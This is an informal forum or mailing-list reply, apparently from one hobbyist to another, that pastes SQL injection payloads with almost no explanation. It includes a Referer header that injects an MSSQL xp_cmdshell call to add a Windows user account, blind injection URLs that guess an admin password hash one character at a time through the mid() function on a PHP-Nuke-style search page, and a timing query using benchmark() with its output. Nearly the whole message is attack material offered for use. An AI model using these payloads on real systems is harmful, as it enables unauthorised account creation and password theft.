here you go m8ty! i feel the power is strong in the young one..... Select fishing involves utilizing the MySQL mid() function to return true if the character is guessed correctly, thereby returning a set of results to the screen GET /index.php HTTP/1.0 Host: yourhost Referer: i-root-you'); exec master..xp_cmdshell 'net user test testpass /ADD' -- or http://site/modules.php?name=search&query=&topic=&category=&author=&days=1+o r+mid(a.pwd,1,1)=6&type=stories then To guess the next character in the sequence the attacker could use the following url: http://site/modules.php? name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,2,1)=1&type= stories <snip> When we modify the query to check if the first digit of the 'admin' password hash is equal to '1', we get the following result: mysql> select pwd from nuke_authors where aid='admin' and if(mid(pwd,1,1)=1,benchmark(10000000,encode("AAAA","AAAA")),1)/*; +----------------------------------+ | pwd | +----------------------------------+ | 21232f297a57a5a743894a0e4a801fc3 | +----------------------------------+ Hope that help richie though i doubt it =) bill Music is the shorthand of emotion" - Leo Tolstoy --==themode2k==--